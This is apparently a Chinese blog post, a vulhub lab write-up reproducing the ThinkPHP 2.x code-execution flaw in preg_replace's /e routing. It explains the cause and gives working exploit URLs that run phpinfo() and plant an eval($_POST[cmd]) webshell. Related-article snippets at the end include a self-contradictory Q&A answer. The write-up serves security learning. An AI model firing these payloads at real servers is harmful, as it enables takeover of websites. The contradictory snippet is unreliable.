【vulhub漏洞复现】Thinkphp 2.x 任意代码执行

最新推荐文章于 2024-07-15 17:14:16 发布
最新推荐文章于 2024-07-15 17:14:16 发布
阅读量2.4k 收藏 2
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: 安全 web安全 php Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/129255718
版权

一、漏洞详情

影响版本 thinkphp 2.x
但是由于thinkphp 3.0版本在Lite模式下没有修复该漏洞,所以也存在该漏洞

漏洞原因:

e 和 /e模式匹配路由:
e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行;
/e 可执行模式,此为PHP专有参数,例如preg_replace函数。

再看看preg_replace这个函数

preg_replace('正则规则','替换字符','目标字符')

就是讲目标字符根据正则规则替换成替换字符

当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码来执行。

举个例子

官方 payload 为 /?.*={${phpinfo()}} ,即 GET 方式传入的参数名为 /?.* ,值为 {${phpinfo()}} 
原先的语句: preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str);
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

最终strtolower("\\1")被执行,相当于 eval(‘strtolower(“\1”);’) 。

strtolower():把所有字符转换为小写

也就是结果是\1,而\1在正则表达式中指定的是第一个子匹配项,phpinfo()就会被成功执行

在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

二、复现过程

  1. 搭建docker环境

docker-compose up -d

  1. 写入phpinfo

http://192.168.239.128:8080/index.php?s=/index/index/xxx/${@phpinfo()}

  1. 写入一句话木马

http://192.168.239.128:8080/index.php?s=/index/index/name/${@print(eval($_POST[cmd]))}

报错但是已经写进去了

连接成功

  1. 代码分析

复现是完成了,但是那个payload是怎么构造出来的呢

// 分析PATHINFO信息
 
        self::getPathInfo();
 
 
        if(!self::routerCheck()){   // 检测路由规则 如果没有则按默认规则调度URL
 
            $paths = explode($depr,trim($_SERVER['PATH_INFO'],'/'));
 
            $var  =  array();
 
            if (C('APP_GROUP_LIST') && !isset($_GET[C('VAR_GROUP')])){
 
                $var[C('VAR_GROUP')] = in_array(strtolower($paths[0]),explode(',',strtolower(C('APP_GROUP_LIST'))))? array_shift($paths) : '';
 
                if(C('APP_GROUP_DENY') && in_array(strtolower($var[C('VAR_GROUP')]),explode(',',strtolower(C('APP_GROUP_DENY'))))) {
 
                    // 禁止直接访问分组
 
                    exit;
 
                }
 
            }
 
            if(!isset($_GET[C('VAR_MODULE')])) {// 还没有定义模块名称
 
                $var[C('VAR_MODULE')]  =   array_shift($paths);
 
            }
 
            $var[C('VAR_ACTION')]  =   array_shift($paths);
 
            // 解析剩余的URL参数
 
            $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
 
            $_GET   =  array_merge($var,$_GET);
 
        }
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

意味着每次会取出两个参数,第一个参数作为var数组的下标,第二个参数作为该下标数组的值(也就是只要你的代码放在偶数位就会被当成数组的值执行)

if(!isset($_GET[C('VAR_MODULE')])) {// 还没有定义模块名称
$var[C('VAR_MODULE')] = array_shift($paths);
}
$var[C('VAR_ACTION')] = array_shift($paths);

当数组$var在路径存在模块和动作时,会去除掉前2个值,所以我们构造的payload的数组的值需要大于2且想要执行的代码需要放在偶数位。

故可以构造payload:

/index.php?s=a/b/c/${phpinfo()}
/index.php?s=a/b/c/${phpinfo()}/c/d/e/f
/index.php?s=a/b/c/d/e/${phpinfo()}
……

至于s是怎么来的:

ThinkPHP5.1在没有定义路由的情况下典型的URL访问规则是:
http://serverName/index.php(或者其它应用入口文件)/模块/控制器/操作/[参数名/参数值…]

如果不支持PATHINFO的服务器可以使用兼容模式访问如下:
http://serverName/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值…]

这篇文章写的非常详细,我也就是照猫画虎,理解最重要。

https://www.freebuf.com/column/223149.html

三、总结

为什么${}会执行?在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称,那么这个函数就会被执行。

希望能从漏洞复现中学习到挖漏洞的思路和技巧,不知道什么时候才能真真正正地有自己挖洞的实力了嗨嗨害。

学习新思想,争做新青年。

每天给自己来碗鸡汤。

RexHarrr
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
Thinkphp 2.x 任意代码执行漏洞
hovcfuti的博客
10-13 262
漏洞简介ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。preg_replace这个函数使用方法如下:preg_replace('正则规则','替换字符','目标字符')这个函数的3个参数,结合起来的意思是:如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞
ThinkPHP 2.x 任意代码执行漏洞
weixin_60329395的博客
10-10 1708
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:depr,paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
thinkphp3.2.x 代码执行
最新发布
qq_23003811的博客
07-15 357
2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。1、构造payload:/index.php?
漏洞复现-thinkphp-命令执行vulfocus/thinkphp-3.2.x
10-14 2205
thinkphp-命令执行】日志包含
vulfocus——thinkphp3.2.x代码执行
m0_62063669的博客
10-01 2001
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。22_10_01是复现的日期,根据自己的时间做调整。
thinkphp系列vulhub所有漏洞复现ThinkPHP 2.x 任意代码执行漏洞ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
qq_47289634的博客
07-06 360
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
漏洞复现----24、ThinkPHP 2.x 任意代码执行漏洞
七天
07-13 1230
文章目录一、ThinkPHP简介二、preg_replace() 函数三、/e四、代码解析五、漏洞复现1、写入phpinfo()2、写入webshell 一、ThinkPHP简介 ThinkPHPPHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 在ThinkP
vulhub-thinkphp漏洞复现
qq_51922767的博客
09-14 2471
vulhub-thinkphp漏洞复现
ThinkPHP3.2.x 代码执行漏洞
guishengyx的博客
10-19 1831
vulfocus靶场
Vulhub复现--ThinkPHP框架系列(一)
tzyyyyyy的博客
04-27 648
Vulhub靶场关于ThinkPHP框架的漏洞复现
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 2443
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 5490
ThinkPHP漏洞整理
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1382
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本: Thinkphp2.x系列以及ThinkPHP 3.0版.
寒假学习第11天--中间件漏洞--vulhub--thinkphp全系列
m0_73581247的博客
01-22 1162
例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。个人笔记,大佬勿喷,小六花祝你每天开心。
thinkphp 2.x 任意代码执行漏洞
06-28
### 回答1: 这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的更新。如果发现了任何问题,应该及时向官方反馈。 ### 回答2: thinkphp是一款非常流行的PHP开源框架,其中的2.x版本存在任意代码执行漏洞。该漏洞存在于框架的核心类文件中,攻击者可以构造特殊的参数,在受害者服务器上执行任意代码,导致服务器被入侵,甚至整个网站被控制。 具体来说,当用户的输入作为参数传递给框架的Loader类时,如果没有进行充分的过滤和验证,攻击者就可以通过注入恶意代码,来控制服务器。在thinkphp 2.x版本中,以下方法是存在问题的: ``` thinkphp/library/think/Loader.php -> import()方法 thinkphp/library/think/Template/Driver.php -> abstract parse()方法 ``` 在import方法中,如果用户通过GET或者POST请求向网站提交数据,在没有进行过滤的情况下,该参数会被直接传递给Loader类,当该参数中含有'://'或者'\\'时,Loader类会默认该参数为URL或文件路径,进而执行include等相关操作,这为攻击者提供了一个绕过安全限制的途径。 在parse方法中,如果用户提交了一个包含PHP代码的模板文件,攻击者可以通过提交的数据来控制parse方法执行时所使用的函数和参数,进而达到任意代码执行的效果。 为了避免该漏洞的出现,开发人员需要注意代码编写规范,尽量避免使用用户输入的数据来构造URL或文件路径,同时需要对用户输入进行充分的过滤和验证,包括数据类型、长度、格式等内容。此外,开发人员也可以使用更加先进的开发框架,或者借助第三方安全验证工具,对网站进行全面的安全测试,以及时发现和修复漏洞,保护网站安全。 ### 回答3: ThinkPHP是一款流行的PHP开发框架,被广泛应用于各种Web应用程序的开发。ThinkPHP 2.x是其中的一个早期版本,该版本因存在任意代码执行漏洞而备受关注。 该漏洞存在于ThinkPHP 2.x的模板解析机制中,该机制允许开发人员在视图页面中使用变量替换来展示动态内容。然而,在未对变量进行过滤的情况下,攻击者可以构造恶意变量,从而实现任意代码执行的攻击。 具体来说,攻击者可以通过在URL参数或提交数据中注入恶意变量来触发漏洞。该变量包含恶意代码,以及一些特殊参数来控制代码执行。攻击者可以通过该漏洞执行系统命令、读取敏感文件、获取访问权限等。 该漏洞的危害性较大,因此开发者应尽快升级到更高版本的ThinkPHP框架,或者采取其他措施来修复漏洞。具体措施包括: 1. 对用户提交的数据进行严格过滤和验证,确保不含有可疑的代码或命令。 2. 设置安全防护机制,如禁止用户上传和执行PHP文件、限制文件读写权限等。 3. 及时升级系统补丁,修复已知的安全漏洞。 总之,任意代码执行漏洞是一种非常危险的漏洞类型,需要开发人员加强安全意识和技术能力,采取有效的预防和修复措施,以确保Web应用程序的安全可靠。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值